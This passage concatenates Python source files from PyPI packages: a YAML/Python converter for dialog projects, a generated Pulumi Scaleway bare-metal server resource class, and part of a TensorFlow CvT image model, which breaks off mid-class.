f"class with read only attributes.") | PypiClean |
/df_script_parser-0.2.0.tar.gz/df_script_parser-0.2.0/df_script_parser/tools.py | from pathlib import Path
import typing as tp
import logging
from black import format_file_in_place, FileMode, WriteBack
from df_script_parser.dumpers_loaders import yaml_dumper_loader
from df_script_parser.processors.dict_processors import Disambiguator
from df_script_parser.processors.recursive_parser import RecursiveParser
from df_script_parser.utils.namespaces import Import, From, Call
from df_script_parser.utils.exceptions import YamlStructureError
def py2yaml(
root_file: Path,
project_root_dir: Path,
output_file: Path,
requirements: tp.Optional[Path] = None,
):
"""Compress a dff project into a yaml file by parsing files inside PROJECT_ROOT_DIR starting with ROOT_FILE.
Extract imports, assignments of dictionaries and function calls from each file.
Recursively parse imported local modules. Collect non-local modules as project requirements
:param root_file: Python file to start parsing with
:type root_file: :py:class:`.Path`
:param project_root_dir: Directory that contains all the local files required to run ``root_file``
:type project_root_dir: :py:class:`.Path`
:param output_file: Yaml file to store parser output in
:type output_file: :py:class:`.Path`
:param requirements: Path to a file containing project requirements, defaults to None
    :type requirements: :py:class:`.Path`, optional
    :return: None
"""
with open(Path(output_file).absolute(), "w", encoding="utf-8") as outfile:
dictionary = RecursiveParser(Path(project_root_dir).absolute()).parse_project_dir(Path(root_file).absolute())
if requirements:
with open(requirements, "r", encoding="utf-8") as reqs:
dictionary["requirements"] = [x for x in reqs.read().split("\n") if x]
yaml_dumper_loader.dump(dictionary, outfile)
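# Illustrative usage sketch (not part of the original module); the paths below are
# assumptions chosen for demonstration, not defaults shipped with the package:
#
#     py2yaml(
#         root_file=Path("bot/main.py"),
#         project_root_dir=Path("bot"),
#         output_file=Path("script.yaml"),
#     )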
def yaml2py(
yaml_file: Path,
extract_to_directory: Path,
):
"""Extract project from a yaml file to a directory
:param yaml_file: Yaml file to extract from
:type yaml_file: :py:class:`.Path`
:param extract_to_directory: Directory to extract to
:type extract_to_directory: :py:class:`.Path`
:return: None
"""
with open(Path(yaml_file).absolute(), "r", encoding="utf-8") as infile:
processed_file = yaml_dumper_loader.load(infile)
namespaces = processed_file.get("namespaces")
requirements = processed_file.get("requirements")
if not namespaces:
raise YamlStructureError("No namespaces found")
if requirements is None:
raise YamlStructureError("No requirements found")
for namespace in namespaces:
path = namespace.split(".")
path_to_file = Path(extract_to_directory).absolute().joinpath(*path[:-1])
if not path_to_file.exists():
path_to_file.mkdir(parents=True, exist_ok=True)
path_to_file = path_to_file / (str(path[-1]) + ".py")
if path_to_file.exists():
logging.warning("File %s already exists", path_to_file)
with open(path_to_file, "w", encoding="utf-8") as outfile:
disambiguator = Disambiguator()
for name, value in namespaces[namespace].items():
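                # Render each namespace entry back to Python source: imports/from-imports
                # become aliased import statements, calls are re-serialized with their
                # arguments disambiguated, and plain values become simple assignments.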
if isinstance(value, (Import, From)):
outfile.write(repr(value) + f" as {name}\n")
elif isinstance(value, Call):
disambiguator.replace_lists_with_tuples = True
for arg in value.args:
value.args[arg] = disambiguator(value.args[arg])
outfile.write(f"{name} = {repr(value)}\n")
disambiguator.replace_lists_with_tuples = False
else:
disambiguator.replace_lists_with_tuples = False
outfile.write(f"{name} = {disambiguator(value)}\n")
disambiguator.add_name(name)
format_file_in_place(path_to_file, fast=False, mode=FileMode(), write_back=WriteBack.YES)
with open(extract_to_directory / "requirements.txt", "w", encoding="utf-8") as reqs:
reqs.write("\n".join(requirements)) | PypiClean |
/pulumi_scaleway-0.3.1a1656517281.tar.gz/pulumi_scaleway-0.3.1a1656517281/pulumi_scaleway/baremetal_server.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BaremetalServerArgs', 'BaremetalServer']
@pulumi.input_type
class BaremetalServerArgs:
def __init__(__self__, *,
offer: pulumi.Input[str],
os: pulumi.Input[str],
ssh_key_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
description: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a BaremetalServer resource.
:param pulumi.Input[str] offer: ID or name of the server offer
:param pulumi.Input[str] os: The base image of the server
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_key_ids: Array of SSH key IDs allowed to SSH to the server
        :param pulumi.Input[str] description: Some description to associate with the server, max 255 characters
:param pulumi.Input[str] hostname: Hostname of the server
:param pulumi.Input[str] name: Name of the server
:param pulumi.Input[str] project_id: The project_id you want to attach the resource to
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Array of tags to associate with the server
:param pulumi.Input[str] zone: The zone you want to attach the resource to
"""
pulumi.set(__self__, "offer", offer)
pulumi.set(__self__, "os", os)
pulumi.set(__self__, "ssh_key_ids", ssh_key_ids)
if description is not None:
pulumi.set(__self__, "description", description)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if name is not None:
pulumi.set(__self__, "name", name)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def offer(self) -> pulumi.Input[str]:
"""
ID or name of the server offer
"""
return pulumi.get(self, "offer")
@offer.setter
def offer(self, value: pulumi.Input[str]):
pulumi.set(self, "offer", value)
@property
@pulumi.getter
def os(self) -> pulumi.Input[str]:
"""
The base image of the server
"""
return pulumi.get(self, "os")
@os.setter
def os(self, value: pulumi.Input[str]):
pulumi.set(self, "os", value)
@property
@pulumi.getter(name="sshKeyIds")
def ssh_key_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Array of SSH key IDs allowed to SSH to the server
"""
return pulumi.get(self, "ssh_key_ids")
@ssh_key_ids.setter
def ssh_key_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ssh_key_ids", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
        Some description to associate with the server, max 255 characters
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[str]]:
"""
Hostname of the server
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the server
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The project_id you want to attach the resource to
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Array of tags to associate with the server
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The zone you want to attach the resource to
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
@pulumi.input_type
class _BaremetalServerState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
ips: Optional[pulumi.Input[Sequence[pulumi.Input['BaremetalServerIpArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
offer: Optional[pulumi.Input[str]] = None,
offer_id: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None,
os: Optional[pulumi.Input[str]] = None,
os_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ssh_key_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering BaremetalServer resources.
        :param pulumi.Input[str] description: Some description to associate with the server, max 255 characters
:param pulumi.Input[str] hostname: Hostname of the server
:param pulumi.Input[str] name: Name of the server
:param pulumi.Input[str] offer: ID or name of the server offer
:param pulumi.Input[str] offer_id: ID of the server offer
:param pulumi.Input[str] organization_id: The organization_id you want to attach the resource to
:param pulumi.Input[str] os: The base image of the server
:param pulumi.Input[str] os_id: The base image ID of the server
:param pulumi.Input[str] project_id: The project_id you want to attach the resource to
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_key_ids: Array of SSH key IDs allowed to SSH to the server
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Array of tags to associate with the server
:param pulumi.Input[str] zone: The zone you want to attach the resource to
"""
if description is not None:
pulumi.set(__self__, "description", description)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if ips is not None:
pulumi.set(__self__, "ips", ips)
if name is not None:
pulumi.set(__self__, "name", name)
if offer is not None:
pulumi.set(__self__, "offer", offer)
if offer_id is not None:
pulumi.set(__self__, "offer_id", offer_id)
if organization_id is not None:
pulumi.set(__self__, "organization_id", organization_id)
if os is not None:
pulumi.set(__self__, "os", os)
if os_id is not None:
pulumi.set(__self__, "os_id", os_id)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if ssh_key_ids is not None:
pulumi.set(__self__, "ssh_key_ids", ssh_key_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
        Some description to associate with the server, max 255 characters
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[str]]:
"""
Hostname of the server
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter
def ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BaremetalServerIpArgs']]]]:
return pulumi.get(self, "ips")
@ips.setter
def ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BaremetalServerIpArgs']]]]):
pulumi.set(self, "ips", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the server
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def offer(self) -> Optional[pulumi.Input[str]]:
"""
ID or name of the server offer
"""
return pulumi.get(self, "offer")
@offer.setter
def offer(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "offer", value)
@property
@pulumi.getter(name="offerId")
def offer_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the server offer
"""
return pulumi.get(self, "offer_id")
@offer_id.setter
def offer_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "offer_id", value)
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> Optional[pulumi.Input[str]]:
"""
The organization_id you want to attach the resource to
"""
return pulumi.get(self, "organization_id")
@organization_id.setter
def organization_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "organization_id", value)
@property
@pulumi.getter
def os(self) -> Optional[pulumi.Input[str]]:
"""
The base image of the server
"""
return pulumi.get(self, "os")
@os.setter
def os(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "os", value)
@property
@pulumi.getter(name="osId")
def os_id(self) -> Optional[pulumi.Input[str]]:
"""
The base image ID of the server
"""
return pulumi.get(self, "os_id")
@os_id.setter
def os_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "os_id", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The project_id you want to attach the resource to
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="sshKeyIds")
def ssh_key_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Array of SSH key IDs allowed to SSH to the server
"""
return pulumi.get(self, "ssh_key_ids")
@ssh_key_ids.setter
def ssh_key_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_key_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Array of tags to associate with the server
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The zone you want to attach the resource to
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
class BaremetalServer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
offer: Optional[pulumi.Input[str]] = None,
os: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ssh_key_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a BaremetalServer resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: Some description to associate with the server, max 255 characters
:param pulumi.Input[str] hostname: Hostname of the server
:param pulumi.Input[str] name: Name of the server
:param pulumi.Input[str] offer: ID or name of the server offer
:param pulumi.Input[str] os: The base image of the server
:param pulumi.Input[str] project_id: The project_id you want to attach the resource to
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_key_ids: Array of SSH key IDs allowed to SSH to the server
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Array of tags to associate with the server
:param pulumi.Input[str] zone: The zone you want to attach the resource to
"""
...
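    # Illustrative usage sketch (hedged; the offer name, OS image ID and SSH key below are
    # placeholders, not values provided by this module — check the Scaleway catalog for real ones):
    #
    #     import pulumi_scaleway as scaleway
    #
    #     server = scaleway.BaremetalServer(
    #         "my-server",
    #         offer="<offer-name-or-id>",
    #         os="<os-image-uuid>",
    #         ssh_key_ids=["<ssh-key-id>"],
    #     )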
@overload
def __init__(__self__,
resource_name: str,
args: BaremetalServerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a BaremetalServer resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param BaremetalServerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BaremetalServerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
offer: Optional[pulumi.Input[str]] = None,
os: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ssh_key_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.plugin_download_url is None:
opts.plugin_download_url = _utilities.get_plugin_download_url()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BaremetalServerArgs.__new__(BaremetalServerArgs)
__props__.__dict__["description"] = description
__props__.__dict__["hostname"] = hostname
__props__.__dict__["name"] = name
if offer is None and not opts.urn:
raise TypeError("Missing required property 'offer'")
__props__.__dict__["offer"] = offer
if os is None and not opts.urn:
raise TypeError("Missing required property 'os'")
__props__.__dict__["os"] = os
__props__.__dict__["project_id"] = project_id
if ssh_key_ids is None and not opts.urn:
raise TypeError("Missing required property 'ssh_key_ids'")
__props__.__dict__["ssh_key_ids"] = ssh_key_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["zone"] = zone
__props__.__dict__["domain"] = None
__props__.__dict__["ips"] = None
__props__.__dict__["offer_id"] = None
__props__.__dict__["organization_id"] = None
__props__.__dict__["os_id"] = None
super(BaremetalServer, __self__).__init__(
'scaleway:index/baremetalServer:BaremetalServer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BaremetalServerIpArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
offer: Optional[pulumi.Input[str]] = None,
offer_id: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None,
os: Optional[pulumi.Input[str]] = None,
os_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ssh_key_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None) -> 'BaremetalServer':
"""
Get an existing BaremetalServer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: Some description to associate with the server, max 255 characters
:param pulumi.Input[str] hostname: Hostname of the server
:param pulumi.Input[str] name: Name of the server
:param pulumi.Input[str] offer: ID or name of the server offer
:param pulumi.Input[str] offer_id: ID of the server offer
:param pulumi.Input[str] organization_id: The organization_id you want to attach the resource to
:param pulumi.Input[str] os: The base image of the server
:param pulumi.Input[str] os_id: The base image ID of the server
:param pulumi.Input[str] project_id: The project_id you want to attach the resource to
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_key_ids: Array of SSH key IDs allowed to SSH to the server
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Array of tags to associate with the server
:param pulumi.Input[str] zone: The zone you want to attach the resource to
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BaremetalServerState.__new__(_BaremetalServerState)
__props__.__dict__["description"] = description
__props__.__dict__["domain"] = domain
__props__.__dict__["hostname"] = hostname
__props__.__dict__["ips"] = ips
__props__.__dict__["name"] = name
__props__.__dict__["offer"] = offer
__props__.__dict__["offer_id"] = offer_id
__props__.__dict__["organization_id"] = organization_id
__props__.__dict__["os"] = os
__props__.__dict__["os_id"] = os_id
__props__.__dict__["project_id"] = project_id
__props__.__dict__["ssh_key_ids"] = ssh_key_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["zone"] = zone
return BaremetalServer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
        Some description to associate with the server, max 255 characters
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
return pulumi.get(self, "domain")
@property
@pulumi.getter
def hostname(self) -> pulumi.Output[Optional[str]]:
"""
Hostname of the server
"""
return pulumi.get(self, "hostname")
@property
@pulumi.getter
def ips(self) -> pulumi.Output[Sequence['outputs.BaremetalServerIp']]:
return pulumi.get(self, "ips")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the server
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def offer(self) -> pulumi.Output[str]:
"""
ID or name of the server offer
"""
return pulumi.get(self, "offer")
@property
@pulumi.getter(name="offerId")
def offer_id(self) -> pulumi.Output[str]:
"""
ID of the server offer
"""
return pulumi.get(self, "offer_id")
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> pulumi.Output[str]:
"""
The organization_id you want to attach the resource to
"""
return pulumi.get(self, "organization_id")
@property
@pulumi.getter
def os(self) -> pulumi.Output[str]:
"""
The base image of the server
"""
return pulumi.get(self, "os")
@property
@pulumi.getter(name="osId")
def os_id(self) -> pulumi.Output[str]:
"""
The base image ID of the server
"""
return pulumi.get(self, "os_id")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The project_id you want to attach the resource to
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="sshKeyIds")
def ssh_key_ids(self) -> pulumi.Output[Sequence[str]]:
"""
Array of SSH key IDs allowed to SSH to the server
"""
return pulumi.get(self, "ssh_key_ids")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Array of tags to associate with the server
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def zone(self) -> pulumi.Output[str]:
"""
The zone you want to attach the resource to
"""
return pulumi.get(self, "zone") | PypiClean |
/xs_transformers-1.0.7-py3-none-any.whl/xs_transformers/models/cvt/modeling_tf_cvt.py | import collections.abc
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import tensorflow as tf
from ...modeling_tf_outputs import TFImageClassifierOutputWithNoAttention
from ...modeling_tf_utils import (
TFModelInputType,
TFPreTrainedModel,
TFSequenceClassificationLoss,
get_initializer,
keras_serializable,
unpack_inputs,
)
from ...tf_utils import shape_list, stable_softmax
from ...utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_cvt import CvtConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "CvtConfig"
TF_CVT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"microsoft/cvt-13",
"microsoft/cvt-13-384",
"microsoft/cvt-13-384-22k",
"microsoft/cvt-21",
"microsoft/cvt-21-384",
"microsoft/cvt-21-384-22k",
# See all Cvt models at https://huggingface.co/models?filter=cvt
]
@dataclass
class TFBaseModelOutputWithCLSToken(ModelOutput):
"""
Base class for model's outputs.
Args:
last_hidden_state (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
cls_token_value (`tf.Tensor` of shape `(batch_size, 1, hidden_size)`):
Classification token at the output of the last layer of the model.
hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus
the initial embedding outputs.
"""
last_hidden_state: tf.Tensor = None
cls_token_value: tf.Tensor = None
hidden_states: Optional[Tuple[tf.Tensor]] = None
class TFCvtDropPath(tf.keras.layers.Layer):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
References:
(1) github.com:rwightman/pytorch-image-models
"""
def __init__(self, drop_prob: float, **kwargs):
super().__init__(**kwargs)
self.drop_prob = drop_prob
def call(self, x: tf.Tensor, training=None):
if self.drop_prob == 0.0 or not training:
return x
keep_prob = 1 - self.drop_prob
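        # Per-sample stochastic depth: draw a Bernoulli(keep_prob) mask broadcastable over all
        # non-batch axes, then rescale by 1/keep_prob so the expected activation is unchanged.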
shape = (tf.shape(x)[0],) + (1,) * (len(tf.shape(x)) - 1)
random_tensor = keep_prob + tf.random.uniform(shape, 0, 1)
random_tensor = tf.floor(random_tensor)
return (x / keep_prob) * random_tensor
class TFCvtEmbeddings(tf.keras.layers.Layer):
"""Construct the Convolutional Token Embeddings."""
def __init__(
self,
config: CvtConfig,
patch_size: int,
embed_dim: int,
stride: int,
padding: int,
dropout_rate: float,
**kwargs,
):
super().__init__(**kwargs)
self.convolution_embeddings = TFCvtConvEmbeddings(
config,
patch_size=patch_size,
embed_dim=embed_dim,
stride=stride,
padding=padding,
name="convolution_embeddings",
)
self.dropout = tf.keras.layers.Dropout(dropout_rate)
def call(self, pixel_values: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.convolution_embeddings(pixel_values)
hidden_state = self.dropout(hidden_state, training=training)
return hidden_state
class TFCvtConvEmbeddings(tf.keras.layers.Layer):
"""Image to Convolution Embeddings. This convolutional operation aims to model local spatial contexts."""
def __init__(
self,
config: CvtConfig,
patch_size: int,
embed_dim: int,
stride: int,
padding: int,
**kwargs,
):
super().__init__(**kwargs)
self.padding = tf.keras.layers.ZeroPadding2D(padding=padding)
self.patch_size = (
patch_size
if isinstance(patch_size, collections.abc.Iterable)
else (patch_size, patch_size)
)
self.projection = tf.keras.layers.Conv2D(
filters=embed_dim,
kernel_size=patch_size,
strides=stride,
padding="valid",
data_format="channels_last",
kernel_initializer=get_initializer(config.initializer_range),
name="projection",
)
# Using the same default epsilon as PyTorch
self.normalization = tf.keras.layers.LayerNormalization(
epsilon=1e-5, name="normalization"
)
def call(self, pixel_values: tf.Tensor) -> tf.Tensor:
if isinstance(pixel_values, dict):
pixel_values = pixel_values["pixel_values"]
pixel_values = self.projection(self.padding(pixel_values))
# "batch_size, height, width, num_channels -> batch_size, (height*width), num_channels"
batch_size, height, width, num_channels = shape_list(pixel_values)
hidden_size = height * width
pixel_values = tf.reshape(
pixel_values, shape=(batch_size, hidden_size, num_channels)
)
pixel_values = self.normalization(pixel_values)
# "batch_size, (height*width), num_channels -> batch_size, height, width, num_channels"
pixel_values = tf.reshape(
pixel_values, shape=(batch_size, height, width, num_channels)
)
return pixel_values
class TFCvtSelfAttentionConvProjection(tf.keras.layers.Layer):
"""Convolutional projection layer."""
def __init__(
self,
config: CvtConfig,
embed_dim: int,
kernel_size: int,
stride: int,
padding: int,
**kwargs,
):
super().__init__(**kwargs)
self.padding = tf.keras.layers.ZeroPadding2D(padding=padding)
self.convolution = tf.keras.layers.Conv2D(
filters=embed_dim,
kernel_size=kernel_size,
kernel_initializer=get_initializer(config.initializer_range),
padding="valid",
strides=stride,
use_bias=False,
name="convolution",
groups=embed_dim,
)
        # Using the same default epsilon as PyTorch; note that TF's BatchNormalization momentum equals (1 - PyTorch momentum)
self.normalization = tf.keras.layers.BatchNormalization(
epsilon=1e-5, momentum=0.9, name="normalization"
)
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.convolution(self.padding(hidden_state))
hidden_state = self.normalization(hidden_state, training=training)
return hidden_state
class TFCvtSelfAttentionLinearProjection(tf.keras.layers.Layer):
"""Linear projection layer used to flatten tokens into 1D."""
def call(self, hidden_state: tf.Tensor) -> tf.Tensor:
# "batch_size, height, width, num_channels -> batch_size, (height*width), num_channels"
batch_size, height, width, num_channels = shape_list(hidden_state)
hidden_size = height * width
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, hidden_size, num_channels)
)
return hidden_state
class TFCvtSelfAttentionProjection(tf.keras.layers.Layer):
"""Convolutional Projection for Attention."""
def __init__(
self,
config: CvtConfig,
embed_dim: int,
kernel_size: int,
stride: int,
padding: int,
projection_method: str = "dw_bn",
**kwargs,
):
super().__init__(**kwargs)
if projection_method == "dw_bn":
self.convolution_projection = TFCvtSelfAttentionConvProjection(
config,
embed_dim,
kernel_size,
stride,
padding,
name="convolution_projection",
)
self.linear_projection = TFCvtSelfAttentionLinearProjection()
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.convolution_projection(hidden_state, training=training)
hidden_state = self.linear_projection(hidden_state)
return hidden_state
class TFCvtSelfAttention(tf.keras.layers.Layer):
"""
    Self-attention layer. A depth-wise separable convolution operation (Convolutional Projection) is applied for
query, key, and value embeddings.
"""
def __init__(
self,
config: CvtConfig,
num_heads: int,
embed_dim: int,
kernel_size: int,
stride_q: int,
stride_kv: int,
padding_q: int,
padding_kv: int,
qkv_projection_method: str,
qkv_bias: bool,
attention_drop_rate: float,
with_cls_token: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.scale = embed_dim**-0.5
self.with_cls_token = with_cls_token
self.embed_dim = embed_dim
self.num_heads = num_heads
self.convolution_projection_query = TFCvtSelfAttentionProjection(
config,
embed_dim,
kernel_size,
stride_q,
padding_q,
projection_method="linear"
if qkv_projection_method == "avg"
else qkv_projection_method,
name="convolution_projection_query",
)
self.convolution_projection_key = TFCvtSelfAttentionProjection(
config,
embed_dim,
kernel_size,
stride_kv,
padding_kv,
projection_method=qkv_projection_method,
name="convolution_projection_key",
)
self.convolution_projection_value = TFCvtSelfAttentionProjection(
config,
embed_dim,
kernel_size,
stride_kv,
padding_kv,
projection_method=qkv_projection_method,
